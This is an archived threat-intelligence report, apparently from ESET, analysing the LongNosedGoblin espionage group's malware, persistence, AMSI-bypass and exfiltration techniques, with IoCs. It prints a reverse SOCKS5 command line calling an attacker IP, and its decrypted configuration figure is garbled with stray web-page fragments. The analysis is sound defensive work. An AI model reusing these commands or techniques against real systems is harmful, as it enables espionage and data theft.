{ "id": "34569ebe-d76f-409e-ae03-4183d978744b", "created_at": "2026-04-06T00:15:07.014303Z", "updated_at": "2026-04-10T03:36:01.259667Z", "deleted_at": null, "sha1_hash": "89a95122b0a4d563a054163efc886c6053bff9c8", "title": "LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 648272, "plain_text": "LongNosedGoblin tries to sniff out governmental affairs in\r\nSoutheast Asia and Japan\r\nBy Anton CherepanovPeter Strýček\r\nArchived: 2026-04-05 19:10:41 UTC\r\nIn 2024, ESET researchers noticed previously undocumented malware in the network of a Southeast Asian\r\ngovernmental entity. This led us to uncover even more new malware on the same system, none of which had\r\nsubstantial ties to any previously tracked threat actors. Based on our findings, we decided to attribute the\r\nmalicious tools to a new China-aligned APT group that we have named LongNosedGoblin.\r\nThe group employs a varied custom toolset consisting mainly of C#/.NET applications, and, notably, uses Group\r\nPolicy to deploy its malware and move laterally across the systems of targeted entities. This blogpost details our\r\ndiscovery of LongNosedGoblin, goes over its known campaigns, and dives into the toolset of the group.\r\nKey points of the report:\r\nLongNosedGoblin is a newly discovered China-aligned APT group targeting governmental\r\nentities in Southeast Asia and Japan, with the goal of cyberespionage.\r\nThe group has been active since at least September 2023.\r\nLongNosedGoblin uses Group Policy to deploy malware across the compromised network, and\r\ncloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C\u0026C)\r\nservers.\r\nOne of the group’s tools, NosyHistorian, is used to gather browser history and decide where to\r\ndeploy further malware, such as the NosyDoor backdoor.\r\nNosyDoor is most likely being shared by multiple China-aligned threat actors.\r\nWe provide a detailed analysis of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader,\r\nNosyLogger, and other tools used by LongNosedGoblin.\r\nSmells like trouble: Introducing LongNosedGoblin\r\nLongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan,\r\nwith the goal of conducting cyberespionage. As we already mentioned: in its campaigns, LongNosedGoblin\r\nabuses Group Policy – a mechanism for managing settings and permissions on Windows machines, typically used\r\nwith Active Directory – to deploy malware and move laterally across the compromised network.\r\nOne of the main tools in its arsenal is NosyHistorian, a C#/.NET application that the group uses to collect browser\r\nhistory, which is then used to determine where to deploy further malware. This includes another major\r\nLongNosedGoblin tool, a backdoor that we named NosyDoor, which, in campaigns we observed, used Microsoft\r\nOneDrive as its C\u0026C server. NosyDoor also employs living-off-the-land techniques in its execution chain, namely\r\nAppDomainManager injection. Finally, several of the group’s tools can bypass the Antimalware Scan Interface\r\n(AMSI), which enables antimalware products to scan various scripts before execution.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 1 of 19\n\nDiscovery\r\nIn February 2024, we found unknown malware on a system of a governmental entity in Southeast Asia. The\r\nmalware was used to drop a custom backdoor, which we later named NosyDoor. At the same time, we noticed that\r\nthe compromise involved not just one, but multiple machines from the same entity, with the malware having been\r\ndeployed via Group Policy.\r\nAdditional analysis revealed that the same victims were also afflicted with a different malicious tool distributed\r\nvia Group Policy, this one used for collecting browser history. We named the tool NosyHistorian. While we found\r\nmany victims affected by NosyHistorian in the course of our original investigation between January and March\r\n2024, only a small subset of them were compromised by NosyDoor. Some samples of NosyDoor’s dropper even\r\ncontained execution guardrails to limit operation to specific victims’ machines.\r\nLater, we identified even more unknown malware on the victims’ machines: NosyStealer, which exfiltrates\r\nbrowser data; NosyDownloader, which downloads and runs a payload in memory; NosyLogger, a keylogger; other\r\ntools like a reverse SOCKS5 proxy; and an argument runner (a tool that runs an application passed as an\r\nargument) that was used to run a video recorder, likely FFmpeg, to capture audio and video. The downloader was\r\nfirst recorded in our telemetry as far back as September 2023.\r\nAttribution\r\nDue to the unique toolset, alongside the use of Group Policy for lateral movement, we decided to attribute the\r\nattacks to a new China-aligned APT group, and named it LongNosedGoblin. We noticed some overlap in the file\r\npaths mentioned in a Kaspersky blogpost about ToddyCat activity, an APT group with similar targeting, but the\r\nmalware in that report lacks code similarity with the malware considered here.\r\nIt should also be noted that in June 2025, the Russian cybersecurity company Solar published a blogpost on an\r\nAPT group it refers to as Erudite Mogwai, which used a payload that closely resembles LongNosedGoblin’s\r\nNosyDoor. According to the authors, Erudite Mogwai targeted the IT infrastructure of a Russian government\r\norganization and Russian IT companies, using the LuckyStrike Agent backdoor in its operations.\r\nHowever, we cannot confirm that Erudite Mogwai and LongNosedGoblin are one and the same, as there is a\r\ndefinite difference in TTPs between the two groups. Notably, the Erudite Mogwai research does not mention the\r\nabuse of Active Directory Group Policy for malware deployment – a technique that is quite specific to\r\nLongNosedGoblin’s operations.\r\nWe later identified another instance of a NosyDoor variant targeting an organization in an EU country, once again\r\nemploying different TTPs, and using the Yandex Disk cloud service as a C\u0026C server. The use of this NosyDoor\r\nvariant suggests that the malware may be shared among multiple China-aligned threat groups. This is further\r\ncorroborated by Solar’s observation of the word Paid in the PDB path of NosyDoor, suggesting that the malware\r\nmay be commercially provided as a service – potentially indicating it is being sold or licensed to other threat\r\nactors.\r\nLater campaigns\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 2 of 19\n\nThroughout 2024, LongNosedGoblin was actively deploying NosyDownloader in Southeast Asia. In December of\r\nthe same year, we detected an updated version of NosyHistorian in Japan, but then observed no subsequent\r\nactivity.\r\nIn September 2025, we began seeing renewed activity of the group in Southeast Asia. As in previous campaigns,\r\nthe threat actor leveraged Group Policy to deliver NosyHistorian to targeted machines.\r\nDuring this wave of attacks, we noticed behavior consistent with Cobalt Strike usage: a loader named oci.dll was\r\ndownloaded on a single machine, with a payload named ocapi.edb loaded from disk. LongNosedGoblin then\r\nsubsequently deployed the potential Cobalt Strike loader to selected machines via Group Policy.\r\nAdditionally, we saw that another similar component, mscorsvc.dll, was downloaded, with its payload stored in\r\nconf.ini. This loader was then deployed to victims’ machines using Group Policy, employing the same delivery\r\nmechanism as oci.dll.\r\nNosyHistorian\r\nNosyHistorian is a C#/.NET application with a self-explanatory internal name GetBrowserHistory, as it, indeed,\r\ncollects browser history. In the observed campaigns, the attackers used this tool to gain insight about the machines\r\nin the compromised infrastructure. Based on this information, they picked a small subset of specific victims to\r\ncompromise further with their NosyDoor backdoor.\r\nWe saw the tool being deployed via Group Policy under the filename History.ini, disguising the file as an INI file.\r\nIn reality, this is a portable executable (PE) file, with the goal most likely being to blend in with other INI files\r\ncommonly stored in the Group Policy cache directory.\r\nNosyHistorian iterates over all users on the machine and retrieves the browser history from Google Chrome,\r\nMicrosoft Edge, and Mozilla Firefox. Each history database file is copied to a temporary directory and then\r\nuploaded to a specific hardcoded SMB share within the local network of the compromised organization.\r\nNosyHistorian’s filename for each web browser’s history file is listed in Table 1, where \u003cprofile_name\u003e\r\ncorresponds to web browser profiles.\r\nTable 1. Crafted history filenames by NosyHistorian\r\nWeb browser Filename\r\nGoogle Chrome \u003cusername\u003e_\u003cmachine_name\u003e_\u003cprofile_name\u003e_History\r\nMicrosoft Edge \u003cusername\u003e_\u003cmachine_name\u003e_edge_History\r\nMozilla Firefox \u003cusername\u003e_\u003cmachine_name\u003e_firefox_\u003cprofile_name\u003e_places.sqlite\r\nBoth this tool and NosyDoor have similar PDB paths and were compiled from the E:\\Csharp directory, with the\r\nNosyHistorian PDB path being: E:\\Csharp\\SharpMisc\\GetBrowserHistory\\obj\\Debug\\GetBrowserHistory.pdb.\r\nNosyDoor\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 3 of 19\n\nAs stated previously, the NosyDoor backdoor uses cloud services, such as Microsoft OneDrive, for its C\u0026C\r\nserver. The malware has a fairly straightforward, three-stage chain of execution, depicted in Figure 1. The first\r\nstage is a dropper that deploys the second stage, which involves a living-off-the-land attack using the\r\nAppDomainManager injection technique, which is in turn used to execute the final payload, the backdoor itself.\r\nNosyDoor collects metadata about the victim’s machine, including the machine name, username, the OS version,\r\nand the name of the current process, and sends it all to the C\u0026C. It then retrieves and parses task files with\r\ncommands from the C\u0026C. The commands allow it to exfiltrate files, delete files, and execute shell commands,\r\namong other things.\r\nFigure 1. NosyDoor execution chain\r\nNosyDoor Stage 1 – dropper\r\nThe malware’s first stage is a dropper, specifically a C#/.NET application with the internal name\r\nOneClickOperation. Same as NosyHistorian, it is deployed via Group Policy. We have seen the dropper\r\nmasquerade as a Registry Policy file by using the filename Registry.pol, although we also observed Registry.plo,\r\nwhich is uncommon (it could be a typo, or maybe the threat actors did not want the filename to conflict with\r\nanother malicious file).\r\nThe dropper base64 decodes embedded files and decrypts them via Data Encryption Standard (DES) with both\r\nkey and initialization vector set to UevAppMo (the first eight bytes of the string UevAppMonitor), then drops\r\nthem to C:\\Windows\\Microsoft.NET\\Framework with the following filenames:\r\nSharedReg.dll\r\nlog.cached\r\nnetfxsbs9.hkf\r\nUevAppMonitor.exe.config\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 4 of 19\n\nThese filenames have been chosen deliberately to blend in with existing files, since the directory normally\r\ncontains files named SharedReg12.dll and netfxsbs12.hkf.\r\nIn its final steps, the dropper creates and starts a Windows scheduled task with the name OneDrive Reporting\r\nTask-S-1-5-21-\u003cGUID\u003e under the Microsoft task folder, where \u003cGUID\u003e is a random GUID string. The scheduled\r\ntask is responsible for executing the legitimate UevAppMonitor.exe in the\r\nC:\\Windows\\Microsoft.NET\\Framework directory during system startup. The dropper copies the legitimate file\r\nfrom C:\\Windows\\System32\\ to the new location.\r\nThe newer samples also include an execution guardrail that makes the dropper function only on victims’\r\ncomputers with a specific machine name (see Figure 2).\r\nFigure 2. Dropper code with execution guardrails\r\nNosyDoor Stage 2 – AppDomainManager injection\r\nUevAppMonitor.exe is a legitimate C#/.NET application, which the malware copied from the\r\nC:\\Windows\\System32\\ to the C:\\Windows\\Microsoft.NET\\Framework directory and used as a living-off-the-land\r\nbinary, or LOLBin. Living-off-the-land attacks abuse legitimate tools already present on the system. In this case,\r\nthe application is used to trigger AppDomainManager injection via a configuration file. This technique can make\r\napplications built in the .NET framework load malicious code instead of the intended legitimate code by making\r\nuse of the AppDomainManager class.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 5 of 19\n\nWhen the application is executed, it loads the configuration file shown in Figure 3, which makes the application\r\ncall the InitializeNewDomain method of the custom SharedReg class in SharedReg.dll. The configuration also sets\r\nthe \u003cetwEnable\u003e element’s enabled attribute to false so that event tracing for Windows is disabled.\r\nFigure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\r\nSharedReg.dll contains code to bypass AMSI, from an open-source AV/EDR evasion framework called inceptor.\r\nOther than that, it base64 decodes the file netfxsbs9.hkf, decrypts the result via AES with key UevAppMonitor,\r\npadded with null bytes until its length is 16, initialization vector 0, and eventually base64 decodes the result again.\r\nThe result is NosyDoor, which is then executed. Any errors are written to the file error.txt in the\r\nC:\\Windows\\Microsoft.NET\\Framework directory.\r\nNosyDoor Stage 3 – payload\r\nNosyDoor’s third stage, the main payload, is a C#/.NET backdoor with the internal name OneDrive and with PDB\r\npath E:\\Csharp\\Thomas\\Server\\ThomasOneDrive\\obj\\Release\\OneDrive.pdb. As this name suggests, the backdoor\r\nuses cloud services, in this case Microsoft OneDrive, as a C\u0026C server.\r\nThe full list of metadata the backdoor collects consists of the following:\r\nexternal IPv4 address,\r\nlocal IPv4 address,\r\nagent ID,\r\nusername,\r\nmachine name,\r\ncurrent directory,\r\ncurrent process (name, ID, architecture),\r\nstage 3 local start time,\r\ncurrent local time,\r\nOS version,\r\nCodeType (see Table 3), and\r\nAgentType (see Table 3).\r\nAll collected metadata is encrypted via RSA and then uploaded to OneDrive as the file Read_\u003cagent_id\u003e.max.\r\nOnce NosyDoor sends the metadata, it looks for commands from the C\u0026C in task files with .max extensions in the\r\nfollowing directory:\r\n\u003cFolderName\u003e-\u003cListenerID\u003e/\u003cagent_id\u003e/\u003cPayload.TaskFolderName\u003e\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 6 of 19\n\nEach task file contains an encrypted command, which is encapsulated with values taken from the backdoor’s\r\nconfiguration:\r\n\u003cPayload.Prepend\u003e\u003cPayload.PayloadPrepend\u003e\u003cencrypted_command\u003e\u003cPayload.PayloadAppend\u003e\r\n\u003cPayload.Append\u003e\r\nThe command is then decoded with base64 and decrypted via AES with key \u003cPayload.Key\u003e and initialization\r\nvector 0. All commands are described in Table 2. Although the command CMD_TYPE_TASKSCHEDULER is\r\nmentioned in the code, it is not implemented in any of the observed samples.\r\nTable 2. Commands supported by NosyDoor\r\nCommand Description\r\nCMD_TYPE_SHELL Execute a shell command.\r\nCMD_TYPE_EXEC_ASM Load a .NET assembly.\r\nCMD_TYPE_EXIT Quit NosyDoor.\r\nCMD_TYPE_REMOVE Delete a file and list its original directory.\r\nCMD_TYPE_DOWNLOAD\r\nExfiltrate a file. Note that download and upload commands are here\r\nnamed in terms of the attacker’s perspective, treating the C\u0026C\r\nmachine as the local machine and the victim machine as the remote\r\none.\r\nCMD_TYPE_UPLOAD\r\nUpload a file to the victim’s machine, delete it from OneDrive, and list\r\nthe directory where the file was uploaded.\r\nCMD_TYPE_DRIVES Get names and sizes of logical drives present on the machine.\r\nCMD_TYPE_FILE_BROWSE Obtain a directory listing, including file icons.\r\nCMD_TYPE_SLEEP Set the beaconing interval.\r\nCMD_TYPE_TASKSCHEDULER Not implemented.\r\nCMD_TYPE_Plugin Load a .NET assembly, directly calling the method Plugin.Run.\r\nAfter executing the command, NosyDoor performs the reverse steps – encrypts command output using AES,\r\nencodes with base64, and encapsulates with the strings \u003cPayload.Prepend\u003e\u003cPayload.PayloadPrepend\u003e and\r\n\u003cPayload.PayloadAppend\u003e\u003cPayload.Append\u003e. Each result is stored on the C\u0026C server in a file with a filename\r\nspecifying local time (Unix timestamp multiplied by 100,000) and ending with the .max extension:\r\n\u003cFolderName\u003e-\u003cListenerID\u003e/\u003cagent_id\u003e/\u003cPayload.ReceiveFolderName\u003e/\u003cunix_timestamp\u003e.max\r\nIf an exception occurs during NosyDoor’s operation, the backdoor writes the exception message together with the\r\nlocal time to C:\\Users\\Public\\Libraries\\thomas.log.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 7 of 19\n\n---\ntitle: IIS Windows Server\n---\nThe backdoor contains a custom dependency named Library that is embedded as a resource by using Costura. It\nmainly contains code related to command processing, Microsoft OneDrive communication, and various helper\nmethods, while the main binary handles the beaconing loop and reads a config file, utilizing the library.\nThe configuration is stored in the file log.cached in encrypted form. NosyDoor decrypts it via XOR with key\nSecretKey, base64 decodes it, then decrypts it via AES with key Thomas, filled with null bytes until its length is\n16, and IV 0. This configuration can be seen in Figure 4.\n{\n \"ListenerID\": 3,\n \"FolderName\": \"Duis euismod, mi, ligula, mattis feugiat, pulvinar.\",\n \"AppID\": \"[redacted]\",\n \"RefreshToken\": \"[redacted]\",\n \"BaseUrl\": \"https://graph.microsoft.com/v1.0/drive\",\n \"TokenUrl\": \"https://login.microsoftonline.com/common/oauth2/v2.0/token\",\n \"CodeType\": \".NET40\",\n \"AgentType\": \"OneDrive\",\n \"Scope\": \"offline_access files.readwrite\",\n \"Sleep\": 66,\n \"BeginDate\": \"08:51:00\",\n \"EndDate\": \"18:51:00\",\n \"Payload\": {\n \"Key\": \"583oq23aonxloet7\",\n \"MetaDataName\": null,\n \"TaskFolderName\": \"Risus blandit mattis\",\n \"ReceiveFolderName\": \"Felis posuere at\",\n \"Prepend\": \"UBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD\n/www.w3.org/1999/xhtml\\\"\u003e\n\nborder:\",\n \"Append\": \";\n }\n --\u003e\n\n[div\u003e \", \"PayloadPrepend\": \"Fames\", \"PayloadAppend\": \"Ipsum\" } } Figure 4. Decrypted configuration (log.cached, beautified) The configuration values and specify the local time range when NosyDoor operates. In this case, NosyDoor is active only between 8:51 am and 6:51 pm. Once authenticated, though, NosyDoor will process commands that are still pending in a queue and send response files regardless of what time it is. NosyStealer NosyStealer is used to steal browser data from Microsoft Edge and Google Chrome. As illustrated in Figure 5, it has a four-stage chain of execution, with the stealer component being the final-stage payload. Figure 5. NosyStealer execution chain NosyStealer Stage 1 – DLL loader The first stage (pmp.exe) in the NosyStealer chain is a C/C++ application. The observed sample simply loads a library named SERV.dll from disk and calls the exported function Hello. https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/ Page 9 of 19](\\\"http://go.microsoft.com/fwlink/?linkid=66138\\u0026amp;clcid=0x409\\\")\n\nNosyStealer Stage 2 – injector\r\nWe observed two NosyStealer Stage 2 samples – one (SERV.dll) in our telemetry, and the other (msi.dll) uploaded\r\nto VirusTotal from Malaysia. Neither has the exported function Hello but both have the main code in DllMain, i.e.,\r\nthe malicious code is run right after the DLL is loaded. They have the following exports:\r\n??0Cv2dllnoinject@@QEAA@XZ\r\n??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z\r\n??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z\r\n?fnv2dllnoinject@@YAHXZ\r\n?nv2dllnoinject@@3HA\r\nThe next-stage data is loaded from the hardcoded path C:\\ProgramData\\Microsoft\\WDF\\MDE.dat. It is decrypted\r\nvia a single-byte XOR cipher with key 0x7A. The result is Donut shellcode that is injected into the running\r\npmp.exe process (NosyStealer Stage 1) using the CreateRemoteThread API in the SERV.dll case, and into a newly\r\ncreated notepad.exe process using the SetThreadContext API in the msi.dll case.\r\nNosyStealer Stage 3 – loader\r\nAs mentioned in the NosyStealer Stage 2 – injector section, this stage is shellcode containing an embedded PE file\r\nthat is decrypted, loaded, and executed in memory using Donut’s reflective loader. The extracted binary is a\r\nC/C++ application.\r\nLike NosyDoor Stage 2 – AppDomainManager injection, this stage uses a known technique to bypass AMSI. It\r\npatches the AmsiScanBuffer function in the loaded amsi.dll with code that returns E_INVALIDARG (see\r\nFigure 6).\r\nFigure 6. Hex-Rays decompiled code that patches AmsiScanBuffer\r\nThen it creates a Windows scheduled task with the name Daily Check Task that runs\r\nC:\\ProgramData\\Microsoft\\WDF\\pmp.exe (NosyStealer Stage 1) every day with permissions of the local system\r\naccount.\r\nAfter patching the AMSI function and persisting, it continues similarly to the previous stage – it decrypts the next\r\nstage from the hardcoded path C:\\ProgramData\\Microsoft\\WDF\\mfd.dat via a single-byte XOR cipher with key\r\n0x7A, where the resulting blob is another Donut shellcode, which is then executed.\r\nNosyStealer Stage 4 – payload\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 10 of 19\n\nAgain, like NosyStealer Stage 3 – loader, this stage is shellcode that decrypts, loads, and executes an embedded\r\nPE file in memory using Donut’s reflective loader. This time, the extracted binary is a Go application that steals\r\nbrowser data from the Microsoft Edge and Google Chrome web browsers. To do so, it downloads a file named\r\nconfig from Google Docs. When the file contains a victim’s ID, NosyStealer reads Microsoft Edge and Google\r\nChrome profile data, archives it with tar, and encrypts it with a custom cipher.\r\nNosyStealer then exfiltrates the encrypted tar archive to Google Drive. Figure 7 is an example of the JSON-formatted configuration, embedded in the binary, required to access Google Drive and Google Docs.\r\n{\r\n \"type\": \"service_account\",\r\n \"project_id\": \"dev0-411506\",\r\n \"private_key_id\": \"[redacted]\",\r\n \"private_key\": \"[redacted]\",\r\n \"client_email\": \"dev0-660@dev0-411506.iam.gserviceaccount.com\",\r\n \"client_id\": \"[redacted]\",\r\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\r\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\r\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\r\n \"client_x509_cert_url\":\r\n\"https://www.googleapis.com/robot/v1/metadata/x509/dev0-660%40dev0-411506.iam.gserviceaccount.com\",\r\n \"universe_domain\": \"googleapis.com\"\r\n}\r\nFigure 7. NosyStealer configuration\r\nNosyStealer also records errors and status messages to a Google Docs file named log, which may include\r\ninformation from more than one victim. The status message includes the constant 9, possibly an indication of the\r\nNosyStealer version. The full status message format, where \u003cmachine_local_ips\u003e represents a list of local IPv4\r\naddresses of network adapters, is as follows:\r\n\u003clocal_date\u003e - \u003cvictim_id\u003e - 9 - heartbeat \u003cmachine_local_ips\u003e\r\nNosyDownloader\r\nAnalyzing ESET telemetry data, we also found in the networks compromised by LongNosedGoblin various\r\noriginally benign applications that had been patched with malicious code. This code contains a downloader that\r\nwe named NosyDownloader, which executes a chain of obfuscated commands passed to a spawned PowerShell\r\nprocess as one long command line argument, meaning that the script is not stored on disk. Every subsequent stage\r\nis encoded with base64, where the last one is additionally deflated with gzip.\r\nEach stage is briefly described in Table 3. Like NosyDoor Stage 2 and NosyStealer Stage 3, the second stage here\r\nalso bypasses AMSI. In this case, NosyDownloader uses Matt Graeber’s reflection method and disabling script\r\nlogging techniques made available on GitHub to bypass AMSI.\r\nTable 3. NosyDownloader script stages\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 11 of 19\n\nStage Description\r\n1 Decodes and executes Stage 2 in a newly created PowerShell process that runs in a hidden window.\r\n2 Bypasses AMSI, then decodes and executes Stage 3.\r\n3 Decodes, decompresses, and executes Stage 4.\r\n4 Downloads a payload and executes it in memory with Invoke-Expression.\r\nWe suspect that NosyDownloader was used to deploy ReverseSocks5, NosyLogger, and an argument runner, as\r\nwe saw them in the span of one week after NosyDownloader was executed.\r\nNosyLogger\r\nWe also identified a C#/.NET keylogger that we named NosyLogger. It seems to be a modified version of the\r\nopen-source keylogger DuckSharp, with the main differences being that it doesn’t send emails or translate logged\r\nkeys into the Cyrillic alphabet.\r\nThe malware initially checks whether a debugger is present via the IsDebuggerPresent and\r\nCheckRemoteDebuggerPresent APIs; if not, it begins its keylogging functionality.\r\nWindow name, pressed keys, and pasted clipboard content are accumulated in memory. NosyLogger encrypts\r\nthese data batches using AES with the key\r\nD53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C and a randomly\r\ngenerated initialization vector of fixed length, where the vector is appended to the encrypted batch of data. The\r\nencrypted data batch is then appended to the file at the hardcoded location C:\\Windows\\Temp\\TS_D418.tmp in\r\nhexadecimal string format. In that file, each encrypted data batch is separated by a newline followed by the string\r\nENDBLOCK. This process of encrypting and storing accumulated data to the file takes place every 10 seconds.\r\nThis file is not exfiltrated by NosyLogger.\r\nOther deployed tools\r\nReverseSocks5\r\nAmong other malware deployed by LongNosedGoblin, we found an open-source reverse SOCKS5 proxy, written\r\nin Go, called ReverseSocks5. We discovered it when we noticed the following command line arguments being\r\nused:\r\n-connect 118.107.234[.]29:8080 -psk \"58fi04qQ\" /F\r\nThe option -psk is used to set a preshared key for encryption and authentication. The argument /F is not handled\r\nby ReverseSocks5 and is probably unintentional; this argument is commonly used with schtasks create.\r\nWe then noticed another set of command line arguments (which do not have the /F argument anymore):\r\n-connect 118.107.234[.]29:8080 -psk \"15Kaf22N3b\"\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 12 of 19\n\nThis second set corresponds to execution of ReverseSocks5, where we observed PowerShell as the parent process.\r\nNosyDownloader was also executed during this time, indicating that the sample was probably deployed with it.\r\nArgument runner\r\nThis is a C#/.NET application with internal name Binary; the sole purpose of this tool is to run an application\r\npassed as an argument. We saw the filename TCOEdge.exe as part of the command line along with arguments that\r\nare specific to the FFmpeg multimedia framework; it was used to record the screen and capture audio, saving it to\r\nC:\\Windows\\Temp\\output.avi.\r\nConclusion\r\nLongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan.\r\nOur analysis of its campaigns revealed numerous pieces of custom malware, which the group uses to conduct\r\ncyberespionage against its victims. Notably, LongNosedGoblin employs Group Policy to perform lateral\r\nmovement within the compromised network.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\n4E3F6E9D0F443F4C4297\r\n4A0551EEE957B498DA3D\r\nHistory.ini MSIL/Spy.Agent.EUU NosyHistorian.\r\nCD745BD2636F607CC4FB\r\n9389535BF3579321CA72\r\nHistory.ini MSIL/Spy.Agent.EUU NosyHistorian.\r\n154A35DD4117DB760699\r\nC2092AFB307E94008506\r\nRegistry.plo\r\nMSIL/TrojanDropper\r\n.Agent.GBQ\r\nNosyDoor stage 1.\r\nB1D4A283A9CCC9E34993\r\nDD2093A904AFBD88B9B9\r\nRegistry.pol\r\nMSIL/TrojanDropper\r\n.Agent.GBQ\r\nNosyDoor stage 1.\r\n77D2A8CB316B7A470E76\r\nE163551A00BB16A696C5\r\nRegistry.plo\r\nMSIL/TrojanDropper\r\n.Agent.GBQ\r\nNosyDoor stage 1.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 13 of 19\n\nSHA-1 Filename Detection Description\r\nF93E449C5520C4718E28\r\n4375C54BE33711505985\r\nRegistry.pol\r\nMSIL/TrojanDropper\r\n.Agent.GBQ\r\nNosyDoor stage 1.\r\n1959E2198D6F81B2604D\r\nF7AC1F508AEB7A6FA07E\r\nSharedReg.dll MSIL/Kryptik.AJBA NosyDoor stage 2.\r\nE0B44715BC4C327C04E6\r\n3F881ECC087B7ACBD306\r\nN/A MSIL/Agent.ESF NosyDoor stage 3.\r\n43C8AE8561E7E3BF9CD7\r\n48136C091099E5CBEEEE\r\nN/A MSIL/Agent.ESF NosyDoor stage 3.\r\nD11FC2D6159CB8BA392B\r\n145B3EE4ADFA15DB4C83\r\nN/A MSIL/Agent.ESF NosyDoor stage 3.\r\nA0A80AC293645076EBAE\r\n393FF0A6A4229E2EDE1C\r\npmp.exe Win64/Agent.DNY\r\nNosyStealer stage\r\n1.\r\nDDBBAE33E04A49D17DD2\r\n4D85B637667B4407AE19\r\nSERV.dll Win64/Agent.DNX\r\nNosyStealer stage\r\n2.\r\n60158C509446893B3B57\r\nD40DC4B4B3795FCDF369\r\nHPSupportAssistant\r\n.exe\r\nPowerShell/TrojanDown\r\nloader.Agent.JJO\r\nNosyDownloader.\r\nF5B7440EE25116A49EC5\r\nEE82507B353880217AC1\r\nRTLWVern.exe PowerShell/Agent.BDR NosyDownloader.\r\n85939C56BFCACD0993E6\r\nFB9F7CFD6137601FB7D4\r\nhpSmartAdapter.exe Win32/Agent.AGIJ NosyDownloader.\r\nC66F9FEC0F8CBF577840\r\n944F61198A75B3E2A58C\r\nhputils.exe Win32/Agent.AGII NosyDownloader.\r\n4C2FCCE3BAB4144D90C7\r\n41A6D77ADF209C786B54\r\nIGCCSvc.exe\r\nMSIL/Spy.Key\r\nlogger.FVW\r\nNosyLogger.\r\n161A25CB0B8FA998BF1B\r\nDEE31F06F24876453CDF\r\nAdobeHelper.exe WinGo/ReverseShell.DX ReverseSocks5.\r\n4D61A9FBBCC4F7A37BE2\r\n1548B55BB5B9B837F83B\r\nmsi.dll Win64/Agent.DOT\r\nNosyStealer stage\r\n2.\r\n5AE440805719250AAEFE\r\nE9B39DACD23D2FB573CD\r\nTCOCertified.exe MSIL/Runner.BW Argument runner.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 14 of 19\n\nSHA-1 Filename Detection Description\r\nE93D32C739825519A10A\r\n4C52C5F1EE33936E4FDB\r\nN/A WinGo/PSW.Agent.FZ\r\nNosyStealer stage\r\n4.\r\n212126896D38C1EE5732\r\n0FB6940FED7A6E30D9EA\r\nN/A Win32/Agent.AGHB\r\nNosyStealer stage\r\n3.\r\nCFFE15AA4D0F9E6577CC\r\nB509ACE9C588937943F2\r\nHPNDFInterface.exe\r\nPowerShell/TrojanDown\r\nloader.Agent.JJO\r\nNosyDownloader.\r\n6AC22CE60B706E3B9A79\r\n27633116911E1087C0D4\r\nbemsvc.exe\r\nPowerShell/TrojanDown\r\nloader.Agent.JJO\r\nNosyDownloader.\r\n2C1959DD85424CEDC96B\r\n1BB86A95FCA440CB9E36\r\nHPDeviceCheck.exe Win32/Agent.AGWU NosyDownloader.\r\n46107B1292B830D9BCEB\r\nBDA6EEDB32FBC05707B4\r\nHP.OCF.exe Win32/Patched.NLL NosyDownloader.\r\n581464978C29B2BC79C6\r\n5766E62011C94D2CBEAB\r\nHP.OCF.exe Win32/Patched.NLL NosyDownloader.\r\n0D91A0E52212EC44E32C\r\n47F7760AF3B473B72798\r\nax_installer.exe\r\nPowerShell/TrojanDown\r\nloader.Agent.JJO\r\nNosyDownloader.\r\n48D715466857FB0C6CD0\r\n249DE6D960FC199438E1\r\nbtdevmanager.exe\r\nMSIL/Spy.Keylogger\r\n_AGen.DL\r\nNosyLogger.\r\n563677CFACD328EA2478\r\n836E58A8BD0DF11206A3\r\ninfo.txt MSIL/Spy.Agent.EUU 